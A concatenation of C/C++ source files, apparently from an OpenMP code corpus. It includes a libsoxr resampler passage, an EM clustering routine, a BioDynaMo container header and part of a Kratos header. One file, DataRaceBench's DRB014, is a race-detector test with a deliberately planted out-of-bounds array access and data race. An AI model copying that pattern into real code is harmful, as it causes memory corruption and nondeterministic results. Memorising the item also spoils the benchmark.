double input_rate, double output_rate,
unsigned num_channels,
soxr_error_t * error0,
soxr_io_spec_t const * io_spec,
soxr_quality_spec_t const * q_spec,
soxr_runtime_spec_t const * runtime_spec)
{
double io_ratio = output_rate!=0? input_rate!=0?
input_rate / output_rate : -1 : input_rate!=0? -1 : 0;
static const float datatype_full_scale[] = {1, 1, 65536.*32768, 32768};
soxr_t p = 0;
soxr_error_t error = 0;
#if WITH_DEV_TRACE
#define _(x) (char)(sizeof(x)>=10? 'a'+(char)(sizeof(x)-10):'0'+(char)sizeof(x))
char const * e = getenv("SOXR_TRACE");
_soxr_trace_level = e? atoi(e) : 0;
{
static char const arch[] = {_(char), _(short), _(int), _(long), _(long long)
, ' ', _(float), _(double), _(long double)
, ' ', _(int *), _(int (*)(int))
, ' ', HAVE_BIGENDIAN ? 'B' : 'L'
#if defined _OPENMP
, ' ', 'O', 'M', 'P'
#endif
, 0};
#undef _
lsx_debug("arch: %s", arch);
}
#endif
if (q_spec && q_spec->e) error = q_spec->e;
else if (io_spec && (io_spec->itype | io_spec->otype) >= SOXR_SPLIT * 2)
error = "invalid io datatype(s)";
if (!error && !(p = calloc(sizeof(*p), 1))) error = "malloc failed";
if (p) {
control_block_t * control_block;
p->q_spec = q_spec? *q_spec : soxr_quality_spec(SOXR_HQ, 0);
if (q_spec) { /* Backwards compatibility with original API: */
if (p->q_spec.passband_end > 2)
p->q_spec.passband_end /= 100;
if (p->q_spec.stopband_begin > 2)
p->q_spec.stopband_begin = 2 - p->q_spec.stopband_begin / 100;
}
p->io_ratio = io_ratio;
p->num_channels = num_channels;
if (io_spec)
p->io_spec = *io_spec;
else
p->io_spec.scale = 1;
p->runtime_spec = runtime_spec? *runtime_spec : soxr_runtime_spec(1);
runtime_num("SOXR_MIN_DFT_SIZE", 8, 15, &p->runtime_spec.log2_min_dft_size);
runtime_num("SOXR_LARGE_DFT_SIZE", 8, 20, &p->runtime_spec.log2_large_dft_size);
runtime_num("SOXR_COEFS_SIZE", 100, 800, &p->runtime_spec.coef_size_kbytes);
runtime_num("SOXR_NUM_THREADS", 0, 64, &p->runtime_spec.num_threads);
runtime_flag("SOXR_COEF_INTERP", 2, 0, &p->runtime_spec.flags);
runtime_flag("SOXR_STRICT_BUF", 1, 2, &p->runtime_spec.flags);
runtime_flag("SOXR_NOSMALLINTOPT", 1, 3, &p->runtime_spec.flags);
p->io_spec.scale *= datatype_full_scale[p->io_spec.otype & 3] /
datatype_full_scale[p->io_spec.itype & 3];
p->seed = (unsigned long)time(0) ^ (unsigned long)(size_t)p;
#if WITH_CR32 || WITH_CR32S || WITH_VR32
if (0
#if WITH_VR32
|| ((!WITH_CR32 && !WITH_CR32S) || (p->q_spec.flags & SOXR_VR))
#endif
#if WITH_CR32 || WITH_CR32S
|| !(WITH_CR64 || WITH_CR64S) || (p->q_spec.precision <= 20 && !(p->q_spec.flags & SOXR_DOUBLE_PRECISION))
#endif
) {
p->deinterleave = (deinterleave_t)_soxr_deinterleave_f;
p->interleave = (interleave_t)_soxr_interleave_f;
control_block =
#if WITH_VR32
((!WITH_CR32 && !WITH_CR32S) || (p->q_spec.flags & SOXR_VR))? &_soxr_vr32_cb :
#endif
#if WITH_CR32S
!WITH_CR32 || should_use_simd32()? &_soxr_rate32s_cb :
#endif
&_soxr_rate32_cb;
}
#if WITH_CR64 || WITH_CR64S
else
#endif
#endif
#if WITH_CR64 || WITH_CR64S
{
p->deinterleave = (deinterleave_t)_soxr_deinterleave;
p->interleave = (interleave_t)_soxr_interleave;
control_block =
#if WITH_CR64S
!WITH_CR64 || should_use_simd64()? &_soxr_rate64s_cb :
#endif
&_soxr_rate64_cb;
}
#endif
memcpy(&p->control_block, control_block, sizeof(p->control_block));
if (p->num_channels && io_ratio!=0)
error = soxr_set_io_ratio(p, io_ratio, 0);
}
if (error)
soxr_delete(p), p = 0;
if (error0)
*error0 = error;
return p;
}
soxr_error_t soxr_set_input_fn(soxr_t p,
soxr_input_fn_t input_fn, void * input_fn_state, size_t max_ilen)
{
p->input_fn_state = input_fn_state;
p->input_fn = input_fn;
p->max_ilen = max_ilen? max_ilen : (size_t)-1;
return 0;
}
static void soxr_delete0(soxr_t p)
{
unsigned i;
if (p->resamplers) for (i = 0; i < p->num_channels; ++i) {
if (p->resamplers[i])
resampler_close(p->resamplers[i]);
free(p->resamplers[i]);
}
free(p->resamplers);
free(p->channel_ptrs);
free(p->shared);
memset(p, 0, sizeof(*p));
}
double soxr_delay(soxr_t p)
{
return
(p && !p->error && p->resamplers)? resampler_delay(p->resamplers[0]) : 0;
}
static soxr_error_t fatal_error(soxr_t p, soxr_error_t error)
{
soxr_delete0(p);
return p->error = error;
}
static soxr_error_t initialise(soxr_t p)
{
unsigned i;
size_t shared_size, channel_size;
resampler_sizes(&shared_size, &channel_size);
p->channel_ptrs = calloc(sizeof(*p->channel_ptrs), p->num_channels);
p->shared = calloc(shared_size, 1);
p->resamplers = calloc(sizeof(*p->resamplers), p->num_channels);
if (!p->shared || !p->channel_ptrs || !p->resamplers)
return fatal_error(p, "malloc failed");
for (i = 0; i < p->num_channels; ++i) {
soxr_error_t error;
if (!(p->resamplers[i] = calloc(channel_size, 1)))
return fatal_error(p, "malloc failed");
error = resampler_create(
p->resamplers[i],
p->shared,
p->io_ratio,
&p->q_spec,
&p->runtime_spec,
p->io_spec.scale);
if (error)
return fatal_error(p, error);
}
return 0;
}
soxr_error_t soxr_set_num_channels(soxr_t p, unsigned num_channels)
{
if (!p) return "invalid soxr_t pointer";
if (num_channels == p->num_channels) return p->error;
if (!num_channels) return "invalid # of channels";
if (p->resamplers) return "# of channels can't be changed";
p->num_channels = num_channels;
return soxr_set_io_ratio(p, p->io_ratio, 0);
}
soxr_error_t soxr_set_io_ratio(soxr_t p, double io_ratio, size_t slew_len)
{
unsigned i;
soxr_error_t error;
if (!p) return "invalid soxr_t pointer";
if ((error = p->error)) return error;
if (!p->num_channels) return "must set # channels before O/I ratio";
if (io_ratio <= 0) return "I/O ratio out-of-range";
if (!p->channel_ptrs) {
p->io_ratio = io_ratio;
return initialise(p);
}
if (p->control_block[8]) {
for (i = 0; !error && i < p->num_channels; ++i)
resampler_set_io_ratio(p->resamplers[i], io_ratio, slew_len);
return error;
}
return fabs(p->io_ratio - io_ratio) < 1e-15? 0 :
"varying O/I ratio is not supported with this quality level";
}
void soxr_delete(soxr_t p)
{
if (p)
soxr_delete0(p), free(p);
}
soxr_error_t soxr_clear(soxr_t p) /* TODO: this, properly. */
{
if (p) {
struct soxr tmp = *p;
soxr_delete0(p);
memset(p, 0, sizeof(*p));
p->input_fn = tmp.input_fn;
p->runtime_spec = tmp.runtime_spec;
p->q_spec = tmp.q_spec;
p->io_spec = tmp.io_spec;
p->num_channels = tmp.num_channels;
p->input_fn_state = tmp.input_fn_state;
memcpy(p->control_block, tmp.control_block, sizeof(p->control_block));
p->deinterleave = tmp.deinterleave;
p->interleave = tmp.interleave;
return (p->q_spec.flags & RESET_ON_CLEAR)?
soxr_set_io_ratio(p, tmp.io_ratio, 0) : 0;
}
return "invalid soxr_t pointer";
}
static void soxr_input_1ch(soxr_t p, unsigned i, soxr_cbuf_t src, size_t len)
{
sample_t * dest = resampler_input(p->resamplers[i], NULL, len);
(*p->deinterleave)(&dest, p->io_spec.itype, &src, len, 1);
}
static size_t soxr_input(soxr_t p, void const * in, size_t len)
{
bool separated = !!(p->io_spec.itype & SOXR_SPLIT);
unsigned i;
if (!p || p->error) return 0;
if (!in && len) {p->error = "null input buffer pointer"; return 0;}
if (!len) {
p->flushing = true;
return 0;
}
if (separated)
for (i = 0; i < p->num_channels; ++i)
soxr_input_1ch(p, i, ((soxr_cbufs_t)in)[i], len);
else {
for (i = 0; i < p->num_channels; ++i)
p->channel_ptrs[i] = resampler_input(p->resamplers[i], NULL, len);
(*p->deinterleave)(
(sample_t **)p->channel_ptrs, p->io_spec.itype, &in, len, p->num_channels);
}
return len;
}
static size_t soxr_output_1ch(soxr_t p, unsigned i, soxr_buf_t dest, size_t len, bool separated)
{
sample_t const * src;
if (p->flushing)
resampler_flush(p->resamplers[i]);
resampler_process(p->resamplers[i], len);
src = resampler_output(p->resamplers[i], NULL, &len);
if (separated)
p->clips += (p->interleave)(p->io_spec.otype, &dest, &src,
len, 1, (p->io_spec.flags & SOXR_NO_DITHER)? 0 : &p->seed);
else p->channel_ptrs[i] = (void /* const */ *)src;
return len;
}
static size_t soxr_output_no_callback(soxr_t p, soxr_buf_t out, size_t len)
{
unsigned u;
size_t done = 0;
bool separated = !!(p->io_spec.otype & SOXR_SPLIT);
#if defined _OPENMP
int i;
if (!p->runtime_spec.num_threads && p->num_channels > 1)
#pragma omp parallel for
for (i = 0; i < (int)p->num_channels; ++i) {
size_t done1;
done1 = soxr_output_1ch(p, (unsigned)i, ((soxr_bufs_t)out)[i], len, separated);
if (!i)
done = done1;
} else
#endif
for (u = 0; u < p->num_channels; ++u)
done = soxr_output_1ch(p, u, ((soxr_bufs_t)out)[u], len, separated);
if (!separated)
p->clips += (p->interleave)(p->io_spec.otype, &out, (sample_t const * const *)p->channel_ptrs,
done, p->num_channels, (p->io_spec.flags & SOXR_NO_DITHER)? 0 : &p->seed);
return done;
}
size_t soxr_output(soxr_t p, void * out, size_t len0)
{
size_t odone, odone0 = 0, olen = len0, osize, idone;
size_t ilen = min(p->max_ilen, (size_t)ceil((double)olen *p->io_ratio));
void const * in = out; /* Set to !=0, so that caller may leave unset. */
bool was_flushing;
if (!p || p->error) return 0;
if (!out && len0) {p->error = "null output buffer pointer"; return 0;}
do {
odone = soxr_output_no_callback(p, out, olen);
odone0 += odone;
if (odone0 == len0 || !p->input_fn || p->flushing)
break;
osize = soxr_datatype_size(p->io_spec.otype) * p->num_channels;
out = (char *)out + osize * odone;
olen -= odone;
idone = p->input_fn(p->input_fn_state, &in, ilen);
was_flushing = p->flushing;
if (!in)
p->error = "input function reported failure";
else soxr_input(p, in, idone);
} while (odone || idone || (!was_flushing && p->flushing));
return odone0;
}
static size_t soxr_i_for_o(soxr_t p, size_t olen, size_t ilen)
{
size_t result;
#if 0
if (p->runtime_spec.flags & SOXR_STRICT_BUFFERING)
result = rate_i_for_o(p->resamplers[0], olen);
else
#endif
result = (size_t)ceil((double)olen * p->io_ratio);
return min(result, ilen);
}
#if 0
static size_t soxr_o_for_i(soxr_t p, size_t ilen, size_t olen)
{
size_t result = (size_t)ceil((double)ilen / p->io_ratio);
return min(result, olen);
}
#endif
soxr_error_t soxr_process(soxr_t p,
void const * in , size_t ilen0, size_t * idone0,
void * out, size_t olen , size_t * odone0)
{
size_t ilen, idone, odone = 0;
unsigned u;
bool flush_requested = false;
if (!p) return "null pointer";
if (!in)
flush_requested = true, ilen = ilen0 = 0;
else {
if ((ptrdiff_t)ilen0 < 0)
flush_requested = true, ilen0 = ~ilen0;
if (idone0 && (1 || flush_requested))
ilen = soxr_i_for_o(p, olen, ilen0);
else
ilen = ilen0/*, olen = soxr_o_for_i(p, ilen, olen)*/;
}
p->flushing |= ilen == ilen0 && flush_requested;
if (!out && !in)
idone = ilen;
else if (p->io_spec.itype & p->io_spec.otype & SOXR_SPLIT) { /* Both i & o */
#if defined _OPENMP
int i;
if (!p->runtime_spec.num_threads && p->num_channels > 1)
#pragma omp parallel for
for (i = 0; i < (int)p->num_channels; ++i) {
size_t done;
if (in)
soxr_input_1ch(p, (unsigned)i, ((soxr_cbufs_t)in)[i], ilen);
done = soxr_output_1ch(p, (unsigned)i, ((soxr_bufs_t)out)[i], olen, true);
if (!i)
odone = done;
} else
#endif
for (u = 0; u < p->num_channels; ++u) {
if (in)
soxr_input_1ch(p, u, ((soxr_cbufs_t)in)[u], ilen);
odone = soxr_output_1ch(p, u, ((soxr_bufs_t)out)[u], olen, true);
}
idone = ilen;
}
else {
idone = ilen? soxr_input (p, in , ilen) : 0;
odone = soxr_output(p, out, olen);
}
if (idone0) *idone0 = idone;
if (odone0) *odone0 = odone;
return p->error;
}
soxr_error_t soxr_oneshot(
double irate, double orate,
unsigned num_channels,
void const * in , size_t ilen, size_t * idone,
void * out, size_t olen, size_t * odone,
soxr_io_spec_t const * io_spec,
soxr_quality_spec_t const * q_spec,
soxr_runtime_spec_t const * runtime_spec)
{
soxr_t resampler;
soxr_error_t error = q_spec? q_spec->e : 0;
if (!error) {
soxr_quality_spec_t q_spec1;
if (!q_spec)
q_spec1 = soxr_quality_spec(SOXR_LQ, 0), q_spec = &q_spec1;
resampler = soxr_create(irate, orate, num_channels,
&error, io_spec, q_spec, runtime_spec);
}
if (!error) {
error = soxr_process(resampler, in, ~ilen, idone, out, olen, odone);
soxr_delete(resampler);
}
return error;
}
soxr_error_t soxr_set_error(soxr_t p, soxr_error_t error)
{
if (!p) return "null pointer";
if (!p->error && p->error != error) return p->error;
p->error = error;
return 0;
}
|
DRB014-outofbounds-orig-yes.c | // RUN: clang %loadLLOV %s -o /dev/null 2>&1 | FileCheck %s
/*
Copyright (c) 2017, Lawrence Livermore National Security, LLC.
Produced at the Lawrence Livermore National Laboratory
Written by Chunhua Liao, Pei-Hung Lin, Joshua Asplund,
Markus Schordan, and Ian Karlin
(email: liao6@llnl.gov, lin32@llnl.gov, asplund1@llnl.gov,
schordan1@llnl.gov, karlin1@llnl.gov)
LLNL-CODE-732144
All rights reserved.
This file is part of DataRaceBench. For details, see
https://github.com/LLNL/dataracebench. Please also see the LICENSE file
for our additional BSD notice.
Redistribution and use in source and binary forms, with
or without modification, are permitted provided that the following
conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the disclaimer below.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the disclaimer (as noted below)
in the documentation and/or other materials provided with the
distribution.
* Neither the name of the LLNS/LLNL nor the names of its contributors
may be used to endorse or promote products derived from this
software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL LAWRENCE LIVERMORE NATIONAL
SECURITY, LLC, THE U.S. DEPARTMENT OF ENERGY OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
THE POSSIBILITY OF SUCH DAMAGE.
*/
/*
The outmost loop is parallelized.
But the inner level loop has out of bound access for b[i][j] when j equals to 0.
This will case memory access of a previous row's last element.
For example, an array of 4x4:
j=0 1 2 3
i=0 x x x x
1 x x x x
2 x x x x
3 x x x x
outer loop: i=2,
inner loop: j=0
array element accessed b[i][j-1] becomes b[2][-1], which in turn is b[1][3]
due to linearized row-major storage of the 2-D array.
This causes loop-carried data dependence between i=2 and i=1.
Data race pair: b[i][j]@75 vs. b[i][j-1]@75.
*/
#include <stdio.h>
int main(int argc, char* argv[])
{
int i,j;
int n=100, m=100;
double b[n][m];
#pragma omp parallel for private(j)
for (i=1;i<n;i++)
for (j=0;j<m;j++) // Note there will be out of bound access
b[i][j]=b[i][j-1];
printf ("b[50][50]=%f\n",b[50][50]);
return 0;
}
// CHECK: Data Race detected
// END
|
bmm_em.c | #include "bmm_em.h"
#include "float.h"
#include "Rinternals.h"
#include "R.h"
#include <omp.h>
void free_bmm_em_result(bmm_em_result* x) {
free(x->pis);
for (int k = 0; k < x->K; k++) {
free(x->protos[k]);
}
free(x->protos);
free(x->cluster);
}
bmm_em_result em(Dataset* ds, int K, int max_iter, int verbose, int hbbmm) {
/** Allocate space **/
//double** protos = sample_prototypes(ds, K);
double** protos = sample_prototypes_hypercube(ds, K);
double* pis = sample_pis(K);
double** z = alloc_z(ds->N, K, ds->D);
// calculate alpha and beta estimates
double alpha, beta;
empirical_bayes(ds, &alpha, &beta);
//Rprintf("alph=%f | beta=%f\n", alpha, beta);
double thresh = 1e-6;
int converged = 0;
double prev = 0;
double ll = -DBL_MAX;
int iter = 0;
while (iter < max_iter && !converged) {
prev = ll;
ll = 0;
// Expectation & log likelihood
ll = log_z_nk(ds, z, pis, protos, K);
if (verbose) {
Rprintf(" %4d | %15.4f\n", iter, ll);
}
// Check converged
if (ll - prev < thresh) {
converged = 1;
if (verbose) {
Rprintf("-- Converged --\n");
}
break;
}
// M-Step /////////////
p_k(pis, z, K, ds->N);
// Pass alpha and beta here
for (int k = 0; k < K; k++) {
if (hbbmm) {
proto_k_hbbmm(ds, z, protos[k], k, alpha, beta);
} else {
proto_k(ds, z, protos[k], k);
}
}
// End M-Step /////////
iter++;
}
// get cluster
int * cluster = (int*) calloc(ds->N, sizeof(int));
for (int n = 0; n < ds->N; n++) {
double max = 0;
for (int k = 0; k < K; k++) {
if (z[n][k] > max) {
max = z[n][k];
cluster[n] = k;
}
}
}
// free everything
for (int n = 0; n < ds->N; n++) {
free(z[n]);
}
free(z);
bmm_em_result result = {
.protos = protos,
.pis = pis,
.cluster = cluster,
.D = ds->D,
.K = K,
.ll = ll
};
return result;
}
double clip(double x) {
double lo = 0.000000001;
double hi = 0.999999999;
if (x < lo) {
x = lo;
} else if (x > hi) {
x = hi;
}
return x;
}
// likelihood of xn given cluster k
double log_p_xn_k(Dataset* ds, int row, double* proto) {
double ll = 0;
double mu;
for (int i = 0; i < ds->D; i++) {
mu = clip(proto[i]);
//mu = proto[i];
ll += at(ds, row, i) ? log(mu) : log(1 - mu);
}
return ll;
}
double log_z_nk(Dataset* ds, double** z, double* pis, double** protos, int K) {
double ll = 0;
double * tmp;
#pragma omp parallel for private(tmp) reduction (+:ll)
for (int n = 0; n < ds->N; n++) {
tmp = (double*) malloc(K * sizeof(double));
double max = -DBL_MAX;
for (int k = 0; k < K; k++) {
tmp[k] = log(pis[k]) + log_p_xn_k(ds, n, protos[k]);
z[n][k] = tmp[k];
// Keep track of the max for logsumexp trick
if (z[n][k] > max) {
max = z[n][k];
}
}
// logsumexp trick
double rowsum = 0;
for (int k = 0; k < K; k++) {
rowsum += exp(z[n][k] - max);
}
rowsum = max + log(rowsum);
//Rprintf("z[n][k]=");
// normalize by dividing by rowsums
for (int k = 0; k < K; k++) {
z[n][k] -= rowsum;
z[n][k] = exp(z[n][k]);
//Rprintf(" %f", z[n][k]);
ll += z[n][k] * tmp[k];
}
//Rprintf("\n");
free(tmp);
}
return ll;
}
void p_k(double* pis, double** z, int K, int N) {
#pragma omp parallel for shared(pis, z)
for (int k = 0; k < K; k++) {
pis[k] = 0; // reset to zero
for (int n = 0; n < N; n++) {
pis[k] += z[n][k];
}
// make sure pis are not zero or one
pis[k] /= N;
}
}
void proto_k(Dataset* ds, double** z, double* proto, int k) {
#pragma omp parallel for shared(proto, z)
for (int i = 0; i < ds->D; i++) {
double num = 0;
double den = 0;
for (int n = 0; n < ds->N; n++) {
num += z[n][k] * at(ds, n, i);
den += z[n][k];
}
proto[i] = clip(num / den);
}
}
void proto_k_hbbmm(Dataset* ds, double** z, double* proto, int k, double alpha, double beta) {
#pragma omp parallel for shared(proto, z)
for (int i = 0; i < ds->D; i++) {
double num = 0;
double den = 0;
for (int n = 0; n < ds->N; n++) {
num += z[n][k] * at(ds, n, i);
den += z[n][k];
}
//proto[i] = clip( (num / den);
proto[i] = (num + alpha - 1.0) / (den + alpha + beta - 2.0);
}
}
double loglik(Dataset* ds, double** z, double* pis, double** protos, int K) {
double ll = 0;
for (int n = 0; n < ds->N; n++) {
for (int k = 0; k < K; k++) {
ll += z[n][k] * (log(pis[k]) + log_p_xn_k(ds, n, protos[k]));
////Rprintf("z[n][k]= %f\n", z[n][k]);
}
}
return ll;
}
double* sample_pis(int K) {
double* pis = (double*) calloc(K, sizeof(double));
for (int k = 0; k < K; k++) {
pis[k] = 1.0/K;
}
return pis;
}
double** sample_prototypes_hypercube(Dataset* ds, int K) {
double** protos = (double**) calloc(K, sizeof(double*));
for (int k = 0; k < K; k++) {
protos[k] = (double*) calloc(ds->D, sizeof(double));
}
// randomly sample a row from x
for (int k = 0; k < K; k++) {
// loop over bits
for (int i = 0; i < ds->D; i++) {
GetRNGstate();
double rand = (unif_rand() - 0.50) * 1e-2;
PutRNGstate();
protos[k][i] = 0.50 + rand;
}
}
return protos;
}
double** sample_prototypes(Dataset* ds, int K) {
double** protos = (double**) calloc(K, sizeof(double*));
for (int k = 0; k < K; k++) {
protos[k] = (double*) calloc(ds->D, sizeof(double));
}
// randomly sample a row from x
for (int k = 0; k < K; k++) {
GetRNGstate();
int row = floor(unif_rand() * ds->N);
PutRNGstate();
// loop over bits
for (int i = 0; i < ds->D; i++) {
GetRNGstate();
double rand = unif_rand();
PutRNGstate();
protos[k][i] = 0.25*at(ds, row, i) + 0.75*rand;
}
}
return protos;
}
double** alloc_z(int N, int K, int D) {
double** z = (double**) calloc(N, sizeof(double*));
for (int n = 0; n < N; n++) {
z[n] = (double*) calloc(K, sizeof(double));
for (int k = 0; k < K; k++) {
z[n][k] = 1.0/K;
}
}
return z;
}
SEXP convert_bmm_em_result(Dataset* ds, bmm_em_result * res, int* prtCnt) {
/** Return the following:
* prototypes as matrix
* pis as numeric vector
* cluster as integer vector
* K, D, ll?
*/
SEXP out = PROTECT(Rf_allocVector(VECSXP, 4));
(*prtCnt)++;
SEXP protos = PROTECT(Rf_allocMatrix(REALSXP, ds->D, res->K));
(*prtCnt)++;
SEXP pis = PROTECT(Rf_allocVector(REALSXP, res->K));
(*prtCnt)++;
SEXP cluster = PROTECT(Rf_allocVector(INTSXP, ds->N));
(*prtCnt)++;
SEXP ll = PROTECT(Rf_allocVector(REALSXP, 1));
(*prtCnt)++;
// TODO: change iteration to avoid tranposing on back end
// copy data to R vectors
for (int k = 0; k < res->K; k++) {
memcpy(&REAL(protos)[k * ds->D], res->protos[k], ds->D * sizeof(double));
}
memcpy(REAL(pis), res->pis, res->K * sizeof(double));
memcpy(INTEGER(cluster), res->cluster, ds->N * sizeof(int));
*REAL(ll) = res->ll;
SEXP names = PROTECT(Rf_allocVector(STRSXP, 4));
(*prtCnt)++;
SET_VECTOR_ELT(out, 0, protos);
SET_VECTOR_ELT(out, 1, pis);
SET_VECTOR_ELT(out, 2, cluster);
SET_VECTOR_ELT(out, 3, ll);
SET_STRING_ELT(names, 0, Rf_mkChar("prototypes"));
SET_STRING_ELT(names, 1, Rf_mkChar("pis"));
SET_STRING_ELT(names, 2, Rf_mkChar("cluster"));
SET_STRING_ELT(names, 3, Rf_mkChar("ll"));
Rf_setAttrib(out, R_NamesSymbol, names);
return out;
}
znk_result predict_log_z_nk(Dataset *ds, double* pis, double** protos, int K) {
double** z = alloc_z(ds->N, K, ds->D);
double ll = 0;
#pragma omp parallel for
for (int n = 0; n < ds->N; n++) {
for (int k = 0; k < K; k++) {
z[n][k] = log_p_xn_k(ds, n, protos[k]);
}
}
znk_result res = {.z = z, .ll = ll, .K = K};
return (res);
};
void free_znk_result(znk_result* x) {
for (int k = 0; k < x->K; k++) {
free(x->z[k]);
}
free(x->z);
};
SEXP convert_znk_result(Dataset* ds, znk_result * res, int* prtCnt) {
SEXP out = PROTECT(Rf_allocVector(VECSXP, 2));
(*prtCnt)++;
SEXP znk = PROTECT(Rf_allocMatrix(REALSXP, ds->N, res->K));
(*prtCnt)++;
SEXP ll = PROTECT(Rf_allocVector(REALSXP, 1));
(*prtCnt)++;
// TODO: change iteration to avoid tranposing on back end
// copy data to R vectors
for (int n = 0; n < ds->N; n++) {
for (int k = 0; k < res->K; k++) {
REAL(znk)[k * ds->N + n] = res->z[n][k];
}
}
REAL(ll)[0] = res->ll;
SEXP names = PROTECT(Rf_allocVector(STRSXP, 2));
(*prtCnt)++;
SET_VECTOR_ELT(out, 0, znk);
SET_VECTOR_ELT(out, 1, ll);
SET_STRING_ELT(names, 0, Rf_mkChar("z"));
SET_STRING_ELT(names, 1, Rf_mkChar("ll"));
Rf_setAttrib(out, R_NamesSymbol, names);
return out;
}
// functions for calculating beta params
double beta_hat(double N, double C, double a0) {
double nca = (N - C) * a0;
double bhat = ( nca + C + sqrt( (nca + C)*(nca + C) - 4.0*C*nca) ) / (2.0*C);
return bhat;
}
double alpha_hat(double N, double C, double bhat) {
double cbn = (C*bhat + N);
double ahat = (cbn + sqrt( cbn*cbn + 4.0*C*bhat*(C-N)) ) / (2.0*(N-C));
return ahat;
}
double beta_nought(double N, double C) {
return (N + sqrt(N*N - 4.0*C*(N-C)) )/(2.0*C);
}
double alpha_nought(double N, double C, double b0) {
double bcn = (b0*C + N);
double res = ( (b0*C - C + N) + sqrt( (bcn*bcn) + 4.0*C*(C-N)*b0) ) / (2.0*(N-C));
return res;
}
void empirical_bayes(Dataset* ds, double* alpha, double* beta) {
double C = 0.0;
double N = (double) ds->N * ds->D;
for (int n = 0; n < ds->N; n++) {
for (int d = 0; d < ds->D; d++) {
C += at(ds, n, d);
}
}
double b0 = beta_nought(N, C);
double a0 = alpha_nought(N, C, b0);
double bhat = beta_hat(N, C, a0);
double ahat = alpha_hat(N, C, bhat);
*alpha = ahat;
*beta = bhat;
}
|
fixed_size_vector.h | // -----------------------------------------------------------------------------
//
// Copyright (C) 2021 CERN & Newcastle University for the benefit of the
// BioDynaMo collaboration. All Rights Reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
//
// See the LICENSE file distributed with this work for details.
// See the NOTICE file distributed with this work for additional information
// regarding copyright ownership.
//
// -----------------------------------------------------------------------------
#ifndef CORE_CONTAINER_FIXED_SIZE_VECTOR_H_
#define CORE_CONTAINER_FIXED_SIZE_VECTOR_H_
#include <cassert>
#include <cstddef>
namespace bdm {
/// Vector with fixed number of elements == Array with push_back function that
/// keeps track of its size
/// NB: No bounds checking. Do not push_back more often than the number of
/// maximum elements given by the template parameter N
template <typename T, std::size_t N>
class FixedSizeVector {
public:
size_t size() const { return size_; } // NOLINT
const T& operator[](size_t idx) const { return data_[idx]; }
T& operator[](size_t idx) { return data_[idx]; }
FixedSizeVector& operator++() {
#pragma omp simd
for (size_t i = 0; i < N; i++) {
++data_[i];
}
return *this;
}
void clear() { size_ = 0; } // NOLINT
void push_back(const T& value) { // NOLINT
assert(size_ < N);
data_[size_++] = value;
}
const T* begin() const { return &(data_[0]); } // NOLINT
const T* end() const { return &(data_[size_]); } // NOLINT
T* begin() { return &(data_[0]); } // NOLINT
T* end() { return &(data_[size_]); } // NOLINT
private:
T data_[N];
std::size_t size_ = 0;
};
} // namespace bdm
#endif // CORE_CONTAINER_FIXED_SIZE_VECTOR_H_
|
bezier_post_utility.h | //
// Project Name: Kratos
// Last Modified by: $Author: hbui $
// Date: $Date: 2013-10-12 $
// Revision: $Revision: 1.0 $
//
//
#if !defined(KRATOS_BEZIER_POST_UTILITY_H_INCLUDED )
#define KRATOS_BEZIER_POST_UTILITY_H_INCLUDED
// System includes
#include <string>
#include <vector>
#include <iostream>
// External includes
#include <omp.h>
#include "boost/progress.hpp"
#ifdef ISOGEOMETRIC_USE_MPI
#include "mpi.h"
#endif
// Project includes
#include "includes/define.h"
#include "includes/model_part.h"
#include "includes/node.h"
#include "includes/element.h"
#include "includes/properties.h"
#include "includes/ublas_interface.h"
#include "includes/legacy_structural_app_vars.h"
#include "spaces/ublas_space.h"
#include "linear_solvers/linear_solver.h"
#include "utilities/openmp_utils.h"
#include "utilities/auto_collapse_spatial_binning.h"
#include "custom_geometries/isogeometric_geometry.h"
#include "custom_utilities/isogeometric_post_utility.h"
#include "isogeometric_application/isogeometric_application.h"
// #define DEBUG_LEVEL1
//#define DEBUG_LEVEL2
//#define DEBUG_MULTISOLVE
//#define DEBUG_GENERATE_MESH
// #define ENABLE_PROFILING
namespace Kratos
{
///@addtogroup IsogeometricApplication
///@{
///@name Kratos Globals
///@{
///@}
///@name Type Definitions
///@{
///@}
///@name Enum's
///@{
///@}
///@name Functions
///@{
///@}
///@name Kratos Classes
///@{
template<typename TDataType>
struct BezierPostUtility_Helper
{
typedef typename Element::GeometryType GeometryType;
typedef typename GeometryType::CoordinatesArrayType CoordinatesArrayType;
/// Interpolation on element
static TDataType& CalculateOnPoint(const Variable<TDataType>& rVariable,
TDataType& rResult, Element::Pointer& pElement, const CoordinatesArrayType& rCoordinates)
{
KRATOS_THROW_ERROR(std::logic_error, "Error calling unimplemented function", __FUNCTION__)
}
};
/// Short class definition.
/**
An advanced utility to export directly the FEM mesh out from isogeometric Bezier mesh. Each Bezier element will generate its own set of FEM elements. Therefore a large amount of nodes and elements may be generated.
One shall carefully use this utility for large problem. Previously, this class is named IsogeometricPostUtility.
*/
class BezierPostUtility : public IsogeometricPostUtility
{
public:
///@name Type Definitions
///@{
typedef boost::numeric::ublas::vector<double> ValuesContainerType;
typedef boost::numeric::ublas::matrix<double> ValuesArrayContainerType;
typedef typename ModelPart::NodesContainerType NodesArrayType;
typedef typename ModelPart::ElementsContainerType ElementsArrayType;
typedef typename ModelPart::ConditionsContainerType ConditionsArrayType;
typedef typename Element::GeometryType GeometryType;
typedef typename GeometryType::PointType NodeType;
typedef IsogeometricGeometry<NodeType> IsogeometricGeometryType;
typedef typename GeometryType::IntegrationPointsArrayType IntegrationPointsArrayType;
